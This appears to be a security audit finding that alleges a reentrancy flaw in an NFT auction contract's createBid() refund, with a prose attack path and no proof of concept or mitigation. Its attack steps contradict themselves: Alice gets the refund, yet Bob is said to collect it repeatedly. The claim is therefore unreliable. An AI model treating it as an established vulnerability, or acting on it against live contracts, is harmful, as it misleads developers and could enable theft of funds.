019.md

Interesting Mulberry Eagle

High

Repeated Refunds to Last Bidder

Summary

The createBid() function in the contract updates the auction state (bidder, amount) after transferring ETH to the last bidder. This allows me to reenter the contract during the external call _safeTransferETHWithFallback(lastBidder, _auction.amount) this before the state update, enabling me to repeatedly receive refunds.

Root Cause

No response

Internal pre-conditions

No response

External pre-conditions

No response

Attack Path

1. Bob (the attacker) places a bid on an auction for a Noun.
2. Bob waits for the auction to near expiration, preparing to place a higher bid.
3. Bob places the new bid, triggering createBid, and the contract attempts to refund the last bidder, Alice.
4. Before the auction state is fully updated (specifically the bidder and amount variables), Alice is refunded.
5. Bob exploits this by calling createBid again, causing the contract to refund multiple times, draining ETH from the contract.

Impact

Bob can repeatedly drain ETH from the contract by exploiting the reentrancy vulnerability. Each time, he can receive Alice's last bid amount, and by triggering this multiple times, he can deplete the contract's funds. This results draining all the ETH from the contract.

PoC

No response

Mitigation

No response